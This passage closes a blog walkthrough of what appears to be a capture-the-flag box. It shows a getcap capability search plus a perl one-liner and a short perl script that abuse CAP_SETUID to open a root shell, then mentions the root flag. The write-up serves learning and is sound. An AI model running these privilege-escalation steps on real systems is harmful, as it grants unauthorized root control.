<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-fish" data-lang="fish"><span style="display:flex;"><span><span style="color:#a6e22e">getcap</span> <span style="color:#a6e22e">-r</span> / <span style="color:#ae81ff">2</span><span style="color:#f92672">&gt;</span>/dev/null
</span></span></code></pre></div><p>would have also worked. Listing all files with special capabilities. As we already thought about <code>CAP_SETUID</code>.</p>
</blockquote>
<p>Nethertheless as we simply tried to run the expolid command surgested at <a href="https://gtfobins.github.io/">GTFOBins</a> we revived nothing.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-fish" data-lang="fish"><span style="display:flex;"><span>./perl <span style="color:#a6e22e">-e</span> <span style="color:#e6db74">&#39;use POSIX qw(setuid); POSIX::setuid(0); exec &#34;/bin/sh&#34;;&#39;</span>
</span></span></code></pre></div><p>However running the same as a little scrip worked, enabling us to enter a root shell. Tada!</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-perl" data-lang="perl"><span style="display:flex;"><span><span style="color:#75715e">#!/usr/bin/perl</span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">use</span> POSIX (setuid);
</span></span><span style="display:flex;"><span>POSIX::setuid(<span style="color:#ae81ff">0</span>);
</span></span><span style="display:flex;"><span>exec <span style="color:#e6db74">&#34;/bin/bash&#34;</span>;
</span></span></code></pre></div><blockquote>
<p><em>Note:</em> We did not find out why it was behaving like this during our hacking session, but after reading in the documentation while doing a recap, it seem that AppArmor was blocking us and got confused with the shebang.</p>
</blockquote>
<p>With the root flag in hand we than finisehd this box.</p>
<h2 id="pwded"><strong>Pwded</strong></h2>


</article>


                    </main>

<footer>

    
    
        <ul>
        
            <li><a href="mailto:felix@oje-oje.de" title="E-Mail"><i class="fas fa-envelope"></i></a></li>
        
            <li><a href="https://github.com/Shepherd-ITSec" title="GitHub"><i class="fab fa-github"></i></a></li>
        
            <li><a href="https://linkedin.com/in/felix-sch%c3%a4fer" title="LinkedIn"><i class="fab fa-linkedin"></i></a></li>
        
        </ul> 
    
    

    

</footer>

</div>
            </div>
        </div>

</body>
</html>
